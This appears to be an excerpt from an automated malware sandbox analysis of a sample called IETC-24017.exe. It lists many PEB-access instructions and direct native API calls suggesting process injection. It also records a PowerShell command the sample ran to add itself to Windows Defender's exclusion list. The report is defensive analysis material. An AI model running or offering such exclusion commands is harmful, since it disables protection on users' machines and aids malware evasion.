                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018C60B8 mov ecx, dword ptr fs:[00000030h]3_2_018C60B8
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018820DE mov eax, dword ptr fs:[00000030h]3_2_018820DE
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA020 mov eax, dword ptr fs:[00000030h]3_2_017FA020
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC020 mov eax, dword ptr fs:[00000030h]3_2_017FC020
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018860E0 mov eax, dword ptr fs:[00000030h]3_2_018860E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018080E9 mov eax, dword ptr fs:[00000030h]3_2_018080E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018420F0 mov ecx, dword ptr fs:[00000030h]3_2_018420F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01884000 mov ecx, dword ptr fs:[00000030h]3_2_01884000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC0F0 mov eax, dword ptr fs:[00000030h]3_2_017FC0F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA0E3 mov ecx, dword ptr fs:[00000030h]3_2_017FA0E3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896030 mov eax, dword ptr fs:[00000030h]3_2_01896030
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802050 mov eax, dword ptr fs:[00000030h]3_2_01802050
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886050 mov eax, dword ptr fs:[00000030h]3_2_01886050
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182C073 mov eax, dword ptr fs:[00000030h]3_2_0182C073
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182438F mov eax, dword ptr fs:[00000030h]3_2_0182438F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182438F mov eax, dword ptr fs:[00000030h]3_2_0182438F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BC3CD mov eax, dword ptr fs:[00000030h]3_2_018BC3CD
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018863C0 mov eax, dword ptr fs:[00000030h]3_2_018863C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov eax, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov eax, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov ecx, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov eax, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A43D4 mov eax, dword ptr fs:[00000030h]3_2_018A43D4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A43D4 mov eax, dword ptr fs:[00000030h]3_2_018A43D4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC310 mov ecx, dword ptr fs:[00000030h]3_2_017FC310
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E3F0 mov eax, dword ptr fs:[00000030h]3_2_0181E3F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E3F0 mov eax, dword ptr fs:[00000030h]3_2_0181E3F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E3F0 mov eax, dword ptr fs:[00000030h]3_2_0181E3F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018363FF mov eax, dword ptr fs:[00000030h]3_2_018363FF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A30B mov eax, dword ptr fs:[00000030h]3_2_0183A30B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A30B mov eax, dword ptr fs:[00000030h]3_2_0183A30B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A30B mov eax, dword ptr fs:[00000030h]3_2_0183A30B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01820310 mov ecx, dword ptr fs:[00000030h]3_2_01820310
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov ecx, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A8350 mov ecx, dword ptr fs:[00000030h]3_2_018A8350
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CA352 mov eax, dword ptr fs:[00000030h]3_2_018CA352
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8397 mov eax, dword ptr fs:[00000030h]3_2_017F8397
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8397 mov eax, dword ptr fs:[00000030h]3_2_017F8397
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8397 mov eax, dword ptr fs:[00000030h]3_2_017F8397
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A437C mov eax, dword ptr fs:[00000030h]3_2_018A437C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE388 mov eax, dword ptr fs:[00000030h]3_2_017FE388
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE388 mov eax, dword ptr fs:[00000030h]3_2_017FE388
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE388 mov eax, dword ptr fs:[00000030h]3_2_017FE388
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E284 mov eax, dword ptr fs:[00000030h]3_2_0183E284
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E284 mov eax, dword ptr fs:[00000030h]3_2_0183E284
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01880283 mov eax, dword ptr fs:[00000030h]3_2_01880283
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01880283 mov eax, dword ptr fs:[00000030h]3_2_01880283
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01880283 mov eax, dword ptr fs:[00000030h]3_2_01880283
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F826B mov eax, dword ptr fs:[00000030h]3_2_017F826B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102A0 mov eax, dword ptr fs:[00000030h]3_2_018102A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102A0 mov eax, dword ptr fs:[00000030h]3_2_018102A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov ecx, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA250 mov eax, dword ptr fs:[00000030h]3_2_017FA250
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F823B mov eax, dword ptr fs:[00000030h]3_2_017F823B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102E1 mov eax, dword ptr fs:[00000030h]3_2_018102E1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102E1 mov eax, dword ptr fs:[00000030h]3_2_018102E1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102E1 mov eax, dword ptr fs:[00000030h]3_2_018102E1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01888243 mov eax, dword ptr fs:[00000030h]3_2_01888243
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01888243 mov ecx, dword ptr fs:[00000030h]3_2_01888243
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806259 mov eax, dword ptr fs:[00000030h]3_2_01806259
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BA250 mov eax, dword ptr fs:[00000030h]3_2_018BA250
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BA250 mov eax, dword ptr fs:[00000030h]3_2_018BA250
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804260 mov eax, dword ptr fs:[00000030h]3_2_01804260
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804260 mov eax, dword ptr fs:[00000030h]3_2_01804260
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804260 mov eax, dword ptr fs:[00000030h]3_2_01804260
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802582 mov eax, dword ptr fs:[00000030h]3_2_01802582
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802582 mov ecx, dword ptr fs:[00000030h]3_2_01802582
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01834588 mov eax, dword ptr fs:[00000030h]3_2_01834588
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E59C mov eax, dword ptr fs:[00000030h]3_2_0183E59C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018805A7 mov eax, dword ptr fs:[00000030h]3_2_018805A7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018805A7 mov eax, dword ptr fs:[00000030h]3_2_018805A7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018805A7 mov eax, dword ptr fs:[00000030h]3_2_018805A7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018245B1 mov eax, dword ptr fs:[00000030h]3_2_018245B1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018245B1 mov eax, dword ptr fs:[00000030h]3_2_018245B1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E5CF mov eax, dword ptr fs:[00000030h]3_2_0183E5CF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E5CF mov eax, dword ptr fs:[00000030h]3_2_0183E5CF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018065D0 mov eax, dword ptr fs:[00000030h]3_2_018065D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A5D0 mov eax, dword ptr fs:[00000030h]3_2_0183A5D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A5D0 mov eax, dword ptr fs:[00000030h]3_2_0183A5D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018025E0 mov eax, dword ptr fs:[00000030h]3_2_018025E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C5ED mov eax, dword ptr fs:[00000030h]3_2_0183C5ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C5ED mov eax, dword ptr fs:[00000030h]3_2_0183C5ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896500 mov eax, dword ptr fs:[00000030h]3_2_01896500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808550 mov eax, dword ptr fs:[00000030h]3_2_01808550
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808550 mov eax, dword ptr fs:[00000030h]3_2_01808550
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183656A mov eax, dword ptr fs:[00000030h]3_2_0183656A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183656A mov eax, dword ptr fs:[00000030h]3_2_0183656A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183656A mov eax, dword ptr fs:[00000030h]3_2_0183656A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BA49A mov eax, dword ptr fs:[00000030h]3_2_018BA49A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F645D mov eax, dword ptr fs:[00000030h]3_2_017F645D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018064AB mov eax, dword ptr fs:[00000030h]3_2_018064AB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018344B0 mov ecx, dword ptr fs:[00000030h]3_2_018344B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01828DBF mov eax, dword ptr fs:[00000030h]3_2_01828DBF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01828DBF mov eax, dword ptr fs:[00000030h]3_2_01828DBF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\IETC-24017.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\IETC-24017.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtClose: Direct from: 0x76F02B6C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtCreateKey: Direct from: 0x76F02C6C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtSetInformationThread: Direct from: 0x76F02B4C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe NtOpenSection: Direct from: 0x76F02E0C
